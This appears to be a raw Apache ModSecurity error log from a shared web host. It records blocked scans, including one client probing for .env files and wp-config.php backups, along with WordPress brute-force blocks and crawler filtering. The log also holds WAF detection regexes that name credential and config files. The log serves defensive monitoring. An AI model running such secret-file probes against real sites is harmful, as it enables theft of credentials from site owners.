[Tue May 26 17:43:08.267099 2026] [security2:error] [pid 924957:tid 925098] [client 14.165.215.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOU-Yv2AvxeXULfJdRYwAAAAs"]
[Tue May 26 17:43:10.043533 2026] [security2:error] [pid 924957:tid 925182] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOVeYv2AvxeXULfJdRngAAAF8"]
[Tue May 26 17:43:12.405155 2026] [security2:error] [pid 924957:tid 925175] [client 147.53.112.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWOWOYv2AvxeXULfJdR8QAAAFg"], referer: https://anujtradingco.com
[Tue May 26 17:43:12.597484 2026] [security2:error] [pid 924957:tid 925152] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOWOYv2AvxeXULfJdR5AAAAEE"]
[Tue May 26 17:43:12.683423 2026] [security2:error] [pid 924957:tid 924962] [remote 45.32.67.165:39504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWOWOYv2AvxeXULfJdR8wAAaAQ"]
[Tue May 26 17:43:12.785787 2026] [security2:error] [pid 924957:tid 925090] [client 184.154.36.177:50294] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "mpdpl.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWOWOYv2AvxeXULfJdSAAAAAAM"]
[Tue May 26 17:43:13.460794 2026] [security2:error] [pid 924957:tid 925119] [client 208.84.101.154:42854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/backend/.env"] [unique_id "ahWOWeYv2AvxeXULfJdSGQAAACA"]
[Tue May 26 17:43:13.462145 2026] [security2:error] [pid 924957:tid 925172] [client 208.84.101.154:42838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/api/.env"] [unique_id "ahWOWeYv2AvxeXULfJdSHQAAAFU"]
[Tue May 26 17:43:13.462203 2026] [security2:error] [pid 924957:tid 925119] [client 208.84.101.154:42820] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahWOWeYv2AvxeXULfJdSHgAAACA"]
[Tue May 26 17:43:13.644123 2026] [security2:error] [pid 924957:tid 925186] [client 208.84.101.154:42832] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/app/.env"] [unique_id "ahWOWeYv2AvxeXULfJdSJwAAAGM"]
[Tue May 26 17:43:14.221895 2026] [security2:error] [pid 924957:tid 925169] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSMQAAAFI"]
[Tue May 26 17:43:15.090454 2026] [security2:error] [pid 924957:tid 925146] [client 85.208.96.195:24930] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWOW-Yv2AvxeXULfJdSZgAAADs"]
[Tue May 26 17:43:15.090572 2026] [security2:error] [pid 924957:tid 925146] [client 85.208.96.195:24930] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWOW-Yv2AvxeXULfJdSZgAAADs"]
[Tue May 26 17:43:15.832008 2026] [security2:error] [pid 924957:tid 925105] [client 212.58.120.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWOW-Yv2AvxeXULfJdSiAAAABI"]
[Tue May 26 17:43:17.145532 2026] [security2:error] [pid 924957:tid 925150] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOXOYv2AvxeXULfJdSnQAAAD8"]
[Tue May 26 17:43:17.708567 2026] [security2:error] [pid 924957:tid 925151] [client 54.37.118.80:27426] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "jhonparra.com"] [uri "/robots.txt"] [unique_id "ahWOXeYv2AvxeXULfJdSvgAAAEA"]
[Tue May 26 17:43:17.708673 2026] [security2:error] [pid 924957:tid 925151] [client 54.37.118.80:27426] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jhonparra.com"] [uri "/robots.txt"] [unique_id "ahWOXeYv2AvxeXULfJdSvgAAAEA"]
[Tue May 26 17:43:19.066031 2026] [security2:error] [pid 924957:tid 925191] [client 54.39.89.46:37470] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "jhonparra.com"] [uri "/"] [unique_id "ahWOX-Yv2AvxeXULfJdS6QAAAGg"]
[Tue May 26 17:43:19.066144 2026] [security2:error] [pid 924957:tid 925191] [client 54.39.89.46:37470] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jhonparra.com"] [uri "/"] [unique_id "ahWOX-Yv2AvxeXULfJdS6QAAAGg"]
[Tue May 26 17:43:19.503316 2026] [security2:error] [pid 924957:tid 925143] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOX-Yv2AvxeXULfJdS6AAAADg"]
[Tue May 26 17:43:20.782424 2026] [security2:error] [pid 924957:tid 924984] [remote 216.73.216.30:64868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOYOYv2AvxeXULfJdTDgAAYxo"]
[Tue May 26 17:43:22.049434 2026] [security2:error] [pid 924957:tid 925210] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOYeYv2AvxeXULfJdTKQAAAHs"]
[Tue May 26 17:43:24.054317 2026] [security2:error] [pid 924957:tid 925103] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOY-Yv2AvxeXULfJdTYAAAABA"]
[Tue May 26 17:43:25.483302 2026] [security2:error] [pid 924957:tid 925146] [client 103.53.219.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWOZeYv2AvxeXULfJdTkwAAADs"]
[Tue May 26 17:43:25.729611 2026] [security2:error] [pid 924957:tid 925019] [remote 216.73.216.30:64868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOZeYv2AvxeXULfJdTmQAAVD0"]
[Tue May 26 17:43:26.595185 2026] [security2:error] [pid 924957:tid 925116] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOZuYv2AvxeXULfJdTtgAAAB0"]
[Tue May 26 17:43:27.277908 2026] [security2:error] [pid 924957:tid 925201] [client 208.84.101.154:42902] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSFwAAAHI"]
[Tue May 26 17:43:27.278112 2026] [security2:error] [pid 924957:tid 925160] [client 208.84.101.154:43046] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSNgAAAEk"]
[Tue May 26 17:43:27.322375 2026] [security2:error] [pid 924957:tid 925129] [client 208.84.101.154:42984] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSPgAAACo"]
[Tue May 26 17:43:27.335485 2026] [security2:error] [pid 924957:tid 925137] [client 208.84.101.154:43002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSOwAAADI"]
[Tue May 26 17:43:27.348938 2026] [security2:error] [pid 924957:tid 925199] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSJAAAAHA"]
[Tue May 26 17:43:27.379595 2026] [security2:error] [pid 924957:tid 925168] [client 208.84.101.154:42880] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSJgAAAFE"]
[Tue May 26 17:43:27.409016 2026] [security2:error] [pid 924957:tid 925087] [client 208.84.101.154:43068] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSQQAAAAA"]
[Tue May 26 17:43:27.426440 2026] [security2:error] [pid 924957:tid 925096] [client 208.84.101.154:42960] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSQAAAAAk"]
[Tue May 26 17:43:27.428390 2026] [security2:error] [pid 924957:tid 925175] [client 208.84.101.154:42808] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSLgAAAFg"]
[Tue May 26 17:43:27.431970 2026] [security2:error] [pid 924957:tid 925202] [client 208.84.101.154:43040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSOgAAAHM"]
[Tue May 26 17:43:27.438506 2026] [security2:error] [pid 924957:tid 925203] [client 208.84.101.154:42926] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSFgAAAHQ"]
[Tue May 26 17:43:28.274020 2026] [security2:error] [pid 924957:tid 925154] [client 208.84.101.154:42910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSFQAAAEM"]
[Tue May 26 17:43:28.284349 2026] [security2:error] [pid 924957:tid 925095] [client 208.84.101.154:42994] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSPQAAAAg"]
[Tue May 26 17:43:28.310947 2026] [security2:error] [pid 924957:tid 925176] [client 208.84.101.154:42970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSEAAAAFk"]
[Tue May 26 17:43:28.315881 2026] [security2:error] [pid 924957:tid 925198] [client 208.84.101.154:43034] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSNwAAAG8"]
[Tue May 26 17:43:28.323478 2026] [security2:error] [pid 924957:tid 925182] [client 208.84.101.154:42888] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSEwAAAF8"]
[Tue May 26 17:43:28.331508 2026] [security2:error] [pid 924957:tid 925159] [client 208.84.101.154:42908] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSEQAAAEg"]
[Tue May 26 17:43:28.353481 2026] [security2:error] [pid 924957:tid 925131] [client 208.84.101.154:43024] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSPAAAACw"]
[Tue May 26 17:43:28.353634 2026] [security2:error] [pid 924957:tid 925193] [client 208.84.101.154:43064] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSQgAAAGo"]
[Tue May 26 17:43:28.354234 2026] [security2:error] [pid 924957:tid 925211] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSIQAAAHw"]
[Tue May 26 17:43:28.358273 2026] [security2:error] [pid 924957:tid 925127] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSIwAAACg"]
[Tue May 26 17:43:28.377468 2026] [security2:error] [pid 924957:tid 925164] [client 208.84.101.154:43060] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSOQAAAE0"]
[Tue May 26 17:43:28.379836 2026] [security2:error] [pid 924957:tid 925098] [client 208.84.101.154:42952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSPwAAAAs"]
[Tue May 26 17:43:28.388908 2026] [security2:error] [pid 924957:tid 925097] [client 208.84.101.154:43014] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSQwAAAAo"]
[Tue May 26 17:43:28.390716 2026] [security2:error] [pid 924957:tid 925148] [client 208.84.101.154:42950] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSEgAAAD0"]
[Tue May 26 17:43:28.672522 2026] [security2:error] [pid 924957:tid 925140] [client 208.84.101.154:42938] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSFAAAADU"]
[Tue May 26 17:43:28.675422 2026] [security2:error] [pid 924957:tid 925134] [client 208.84.101.154:42868] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOWeYv2AvxeXULfJdSGwAAAC8"]
[Tue May 26 17:43:28.874079 2026] [security2:error] [pid 924957:tid 925180] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOaOYv2AvxeXULfJdT-QAAAF0"]
[Tue May 26 17:43:29.856027 2026] [proxy:error] [pid 924957:tid 925181] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:43:29.856086 2026] [proxy_http:error] [pid 924957:tid 925181] [client 205.210.31.154:58374] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:43:29.856737 2026] [proxy:error] [pid 924957:tid 925181] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:43:29.856777 2026] [proxy_http:error] [pid 924957:tid 925181] [client 205.210.31.154:58374] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:43:30.883335 2026] [security2:error] [pid 924957:tid 925196] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOauYv2AvxeXULfJdUPgAAAG0"]
[Tue May 26 17:43:31.034552 2026] [security2:error] [pid 924957:tid 925025] [remote 216.73.216.30:8535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOa-Yv2AvxeXULfJdUSAAATEM"]
[Tue May 26 17:43:31.044587 2026] [authz_core:error] [pid 924957:tid 925109] [client 208.84.101.154:39424] AH01630: client denied by server configuration: /home1/freshrlj/murugaa.in/wp-content/debug.log
[Tue May 26 17:43:31.647227 2026] [security2:error] [pid 924957:tid 925045] [remote 209.38.221.42:46236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.221.38.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWOa-Yv2AvxeXULfJdUWQAABFc"]
[Tue May 26 17:43:32.039846 2026] [security2:error] [pid 924957:tid 925087] [client 208.84.101.154:3880] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/wp-config.php.save"] [unique_id "ahWObOYv2AvxeXULfJdUbwAAAAA"]
[Tue May 26 17:43:32.041242 2026] [security2:error] [pid 924957:tid 925152] [client 208.84.101.154:3842] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/wp-config.php.bak"] [unique_id "ahWObOYv2AvxeXULfJdUcQAAAEE"]
[Tue May 26 17:43:32.041258 2026] [security2:error] [pid 924957:tid 925107] [client 208.84.101.154:39424] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/wp-config.php.old"] [unique_id "ahWObOYv2AvxeXULfJdUcgAAABQ"]
[Tue May 26 17:43:32.099984 2026] [security2:error] [pid 924957:tid 925204] [client 208.84.101.154:3890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.101.84.208.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.wp-config.php.swp"] [unique_id "ahWObOYv2AvxeXULfJdUbQAAAHU"]
